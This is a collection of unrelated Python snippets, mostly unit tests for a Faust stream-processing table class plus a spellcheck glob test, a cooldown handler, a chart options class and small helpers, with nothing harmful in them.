(1.1, 1.4)), 'BOO')) @pytest.mark.parametrize('source_n,change_n,expect_error', [(3, 3, False), (3, None, False), (None, 3, False), (3, 6, True), (6, 3, True)]) def 
test__verify_source_topic_partitions(self, source_n, change_n, expect_error, *, app, table): event = Mock(name='event', autospec=Event) tps = {event.message.topic: source_n, table.changelog_topic.get_topic_name(): change_n} app.consumer.topic_partitions = Mock(side_effect=tps.get) if expect_error: with pytest.raises(PartitionsMismatch): table._verify_source_topic_partitions(event.message.topic) else: table._verify_source_topic_partitions(event.message.topic) @pytest.mark.asyncio async def test_clean_data(self, *, table): table._should_expire_keys = Mock(name='_should_expire_keys') table._should_expire_keys.return_value = False (await table._clean_data(table)) table._should_expire_keys.return_value = True table._del_old_keys = AsyncMock(name='_del_old_keys') def on_sleep(secs, **kwargs): if (table.sleep.call_count > 2): table._stopped.set() table.sleep = AsyncMock(name='sleep', side_effect=on_sleep) (await table._clean_data(table)) table._del_old_keys.assert_called_once_with() table.sleep.assert_called_with(pytest.approx(table.app.conf.table_cleanup_interval, rel=0.1)) def test_should_expire_keys(self, *, table): table.window = None assert (not table._should_expire_keys()) table.window = Mock(name='window', autospec=Window) table.window.expires = 3600 assert table._should_expire_keys() def test_join(self, *, table): table._join = Mock(name='join') ret = table.join(User.id, User.name) table._join.assert_called_once_with(joins.RightJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_left_join(self, *, table): table._join = Mock(name='join') ret = table.left_join(User.id, User.name) table._join.assert_called_once_with(joins.LeftJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_inner_join(self, *, table): table._join = Mock(name='join') ret = table.inner_join(User.id, User.name) table._join.assert_called_once_with(joins.InnerJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test_outer_join(self, *, table): table._join = Mock(name='join') ret = table.outer_join(User.id, User.name) table._join.assert_called_once_with(joins.OuterJoin(stream=table, fields=(User.id, User.name))) assert (ret is table._join()) def test__join(self, *, table): with pytest.raises(NotImplementedError): table._join(Mock(name='join_strategy', autospec=joins.Join)) def test_clone(self, *, table): t2 = table.clone() assert (t2.info() == table.info()) def test_combine(self, *, table): with pytest.raises(NotImplementedError): table.combine(Mock(name='joinable', autospec=Stream)) def test_contribute_to_stream(self, *, table): table.contribute_to_stream(Mock(name='stream', autospec=Stream)) @pytest.mark.asyncio async def test_remove_from_stream(self, *, table): (await table.remove_from_stream(Mock(name='stream', autospec=Stream))) def test_new_changelog_topic__window_expires(self, *, table): table.window = Mock(name='window', autospec=Window) table.window.expires = 3600.3 assert (table._new_changelog_topic(retention=None).retention == 3600.3) def test_new_changelog_topic__default_compacting(self, *, table): table._changelog_compacting = True assert table._new_changelog_topic(compacting=None).compacting table._changelog_compacting = False assert (not table._new_changelog_topic(compacting=None).compacting) assert table._new_changelog_topic(compacting=True).compacting def test_new_changelog_topic__default_deleting(self, *, table): table._changelog_deleting = True assert table._new_changelog_topic(deleting=None).deleting table._changelog_deleting = 
False assert (not table._new_changelog_topic(deleting=None).deleting) assert table._new_changelog_topic(deleting=True).deleting def test_copy(self, *, table): assert (copy(table).info() == table.info()) def test_and(self, *, table): with pytest.raises(NotImplementedError): (table & table) def test__maybe_set_key_ttl(self, *, table): table._should_expire_keys = Mock(return_value=False) table._maybe_set_key_ttl(('k', (100, 110)), 0) table._should_expire_keys = Mock(return_value=True) table._maybe_set_key_ttl(('k', (100, 110)), 0) def test__maybe_del_key_ttl(self, *, table): table._partition_timestamp_keys[(0, 110)] = None table._should_expire_keys = Mock(return_value=False) table._maybe_del_key_ttl(('k', (100, 110)), 0) table._should_expire_keys = Mock(return_value=True) table._maybe_del_key_ttl(('k', (100, 110)), 0) table._partition_timestamp_keys[(0, 110)] = {('k', (100, 110)), ('v', (100, 110))} table._maybe_del_key_ttl(('k', (100, 110)), 0) assert (table._partition_timestamp_keys[(0, 110)] == {('v', (100, 110))}) def test_apply_window_op(self, *, table): self.mock_ranges(table) table._set_key(('k', 1.1), 30) table._set_key(('k', 1.2), 40) table._set_key(('k', 1.3), 50) table._apply_window_op(operator.add, 'k', 12, 300.3) assert (table._get_key(('k', 1.1)) == 42) assert (table._get_key(('k', 1.2)) == 52) assert (table._get_key(('k', 1.3)) == 62) def test_set_del_windowed(self, *, table): ranges = self.mock_ranges(table) table._set_windowed('k', 11, 300.3) for r in ranges: assert (table._get_key(('k', r)) == 11) table._del_windowed('k', 300.3) for r in ranges: assert (table._get_key(('k', r)) is None) def test_window_ranges(self, *, table): table.window = Mock(name='window', autospec=Window) table.window.ranges.return_value = [1, 2, 3] assert (list(table._window_ranges(300.3)) == [1, 2, 3]) def mock_ranges(self, table, ranges=[1.1, 1.2, 1.3]): table._window_ranges = Mock(name='_window_ranges') table._window_ranges.return_value = ranges return ranges def test_relative_now(self, *, table): event = Mock(name='event', autospec=Event) table._partition_latest_timestamp[event.message.partition] = 30.3 assert (table._relative_now(event) == 30.3) def test_relative_now__no_event(self, *, table): with patch('faust.tables.base.current_event') as ce: ce.return_value = None with patch('time.time') as time: assert (table._relative_now(None) is time()) def test_relative_event(self, *, table): event = Mock(name='event', autospec=Event) assert (table._relative_event(event) is event.message.timestamp) def test_relative_event__raises_if_no_event(self, *, table): with patch('faust.tables.base.current_event') as current_event: current_event.return_value = None with pytest.raises(RuntimeError): table._relative_event(None) def test_relative_field(self, *, table): user = User('foo', 'bar') event = Mock(name='event', autospec=Event) event.value = user assert (table._relative_field(User.id)(event) == 'foo') def test_relative_field__raises_if_no_event(self, *, table): with pytest.raises(RuntimeError): table._relative_field(User.id)(event=None) def test_relative_timestamp(self, *, table): assert (table._relative_timestamp(303.3)(Mock(name='event', autospec=Event)) == 303.3) def test_windowed_now(self, *, table): with patch('faust.tables.base.current_event'): table.window = Mock(name='window', autospec=Window) table.window.earliest.return_value = 42 table._get_key = Mock(name='_get_key') table._windowed_now('k') table._get_key.assert_called_once_with(('k', 42)) def test_windowed_timestamp(self, *, table): table.window 
= Mock(name='window', autospec=Window) table.window.current.return_value = 10.1 assert (not table._windowed_contains('k', 303.3)) table._set_key(('k', 10.1), 101.1) assert (table._windowed_timestamp('k', 303.3) == 101.1) assert table._windowed_contains('k', 303.3) def test_windowed_delta(self, *, table): event = Mock(name='event', autospec=Event) table.window = Mock(name='window', autospec=Window) table.window.delta.return_value = 10.1 table._set_key(('k', 10.1), 101.1) assert (table._windowed_delta('k', 303.3, event=event) == 101.1) @pytest.mark.asyncio async def test_on_rebalance(self, *, table): table._data = Mock(name='data', autospec=Store, on_rebalance=AsyncMock()) generation_id = 1 (await table.on_rebalance({TP1}, set(), set(), generation_id)) table._data.on_rebalance.assert_called_once_with({TP1}, set(), set(), generation_id) @pytest.mark.asyncio async def test_on_changelog_event(self, *, table): event = Mock(name='event', autospec=Event) table._on_changelog_event = None (await table.on_changelog_event(event)) table._on_changelog_event = AsyncMock(name='callback') (await table.on_changelog_event(event)) table._on_changelog_event.assert_called_once_with(event) def test_label(self, *, table): assert label(table) def test_shortlabel(self, *, table): assert shortlabel(table) def test_apply_changelog_batch(self, *, table): table._data = Mock(name='data', autospec=Store) table.apply_changelog_batch([1, 2, 3]) table._data.apply_changelog_batch.assert_called_once_with([1, 2, 3], to_key=table._to_key, to_value=table._to_value) def test_to_key(self, *, table): assert (table._to_key([1, 2, 3]) == (1, 2, 3)) assert (table._to_key(1) == 1) def test_to_value(self, *, table): v = Mock(name='v') assert (table._to_value(v) is v) def test__human_channel(self, *, table): assert table._human_channel() def test_repr_info(self, *, table): assert (table._repr_info() == table.name) def test_partition_for_key__partitioner(self, *, table, app): table.use_partitioner = True partition = None assert (table.partition_for_key('k') is partition)
class TestGlob(util.PluginTestCase): def test_glob_limit(self): config = self.dedent("\n matrix:\n - name: glob\n default_encoding: utf-8\n glob_pattern_limit: 10\n sources:\n - '{}/**/test-{{1..11}}.txt'\n aspell:\n lang: en\n d: en_US\n hunspell:\n d: en_US\n pipeline: null\n ").format(self.tempdir) self.mktemp('.glob.yml', config, 'utf-8') with self.assertRaises(PatternLimitException): self.assert_spellcheck('.glob.yml', []) def test_glob_no_limit(self): config = self.dedent("\n matrix:\n - name: glob\n default_encoding: utf-8\n glob_pattern_limit: 0\n sources:\n - '{}/**/test-{{1..11}}.txt'\n aspell:\n lang: en\n d: en_US\n hunspell:\n d: en_US\n pipeline: null\n ").format(self.tempdir) self.mktemp('.glob.yml', config, 'utf-8') bad_words = ['helo', 'begn'] good_words = ['yes', 'word'] self.mktemp('test-1.txt', '\n'.join((bad_words + good_words)), 'utf-8') self.assert_spellcheck('.glob.yml', bad_words)
def update_model_folders(): subdirs = [] cnt = 0 for (root, dirs, files) in os.walk(os.path.abspath('./logs')): for dir_name in dirs: if (os.path.basename(dir_name) != 'eval'): subdirs.append(os.path.join(root, dir_name)) cnt += 1 print(subdirs) return (f'Found {cnt} model folders', gr.Dropdown.update(choices=subdirs))
class Attachment(BaseObject): def __init__(self, api=None, content_type=None, content_url=None, file_name=None, id=None, size=None, thumbnails=None, **kwargs): self.api = api self.content_type = content_type self.content_url = content_url self.file_name = file_name self.id = id self.size = size self.thumbnails = thumbnails for (key, value) in kwargs.items(): setattr(self, key, value) for key in self.to_dict(): if (getattr(self, key) is None): try: self._dirty_attributes.remove(key) except KeyError: continue
class OptionSeriesArearangeSonification(Options): def contextTracks(self) -> 'OptionSeriesArearangeSonificationContexttracks': return self._config_sub_data('contextTracks', OptionSeriesArearangeSonificationContexttracks) def defaultInstrumentOptions(self) -> 'OptionSeriesArearangeSonificationDefaultinstrumentoptions': return self._config_sub_data('defaultInstrumentOptions', OptionSeriesArearangeSonificationDefaultinstrumentoptions) def defaultSpeechOptions(self) -> 'OptionSeriesArearangeSonificationDefaultspeechoptions': return self._config_sub_data('defaultSpeechOptions', OptionSeriesArearangeSonificationDefaultspeechoptions) def enabled(self): return self._config_get(True) def enabled(self, flag: bool): self._config(flag, js_type=False) def pointGrouping(self) -> 'OptionSeriesArearangeSonificationPointgrouping': return self._config_sub_data('pointGrouping', OptionSeriesArearangeSonificationPointgrouping) def tracks(self) -> 'OptionSeriesArearangeSonificationTracks': return self._config_sub_data('tracks', OptionSeriesArearangeSonificationTracks)
class CooldownHandler(): __slots__ = ('data', 'db_attribute', 'obj') def __init__(self, obj, db_attribute='cooldowns'): if (not obj.attributes.has(db_attribute)): obj.attributes.add(db_attribute, {}) self.data = obj.attributes.get(db_attribute) self.obj = obj self.db_attribute = db_attribute self.cleanup() def all(self): return list(self.data.keys()) def ready(self, *args): return (self.time_left(*args, use_int=True) <= 0) def time_left(self, *args, use_int=False): now = time.time() cooldowns = [(self.data[x] - now) for x in args if (x in self.data)] if (not cooldowns): return (0 if use_int else 0.0) left = max(max(cooldowns), 0) return (math.ceil(left) if use_int else left) def add(self, cooldown, seconds): now = time.time() self.data[cooldown] = (now + (max(seconds, 0) if seconds else 0)) set = add def extend(self, cooldown, seconds): time_left = (self.time_left(cooldown) + (seconds if seconds else 0)) self.set(cooldown, time_left) return max(time_left, 0) def reset(self, cooldown): if (cooldown in self.data): del self.data[cooldown] def clear(self): self.data.clear() def cleanup(self): now = time.time() cooldowns = dict(self.data) keys = [x for x in cooldowns.keys() if ((cooldowns[x] - now) < 0)] if keys: for key in keys: del cooldowns[key] self.obj.attributes.add(self.db_attribute, cooldowns) self.data = self.obj.attributes.get(self.db_attribute)
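A rough usage sketch: CooldownHandler only needs an object exposing an Evennia-style attributes API (has/add/get), so the stub below is an assumption for illustration, not part of the original code.

# Minimal stand-in for an Evennia object with an attributes handler.
class _Attrs:
    def __init__(self):
        self._store = {}
    def has(self, key):
        return key in self._store
    def add(self, key, value):
        self._store[key] = value
    def get(self, key):
        return self._store[key]

class _Obj:
    def __init__(self):
        self.attributes = _Attrs()

cooldowns = CooldownHandler(_Obj())
cooldowns.add('attack', 5)                            # start a 5-second cooldown
print(cooldowns.ready('attack'))                      # False until it expires
print(cooldowns.time_left('attack', use_int=True))    # whole seconds remaining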
@pytest.mark.asyncio class TestTasksCountUsers(): async def test_count_users(self, main_session_manager, workspace_session_manager, send_task_mock: MagicMock): count_users = CountUsersTask(main_session_manager, workspace_session_manager, send_task=send_task_mock) (await count_users.run()) send_task_mock.assert_called()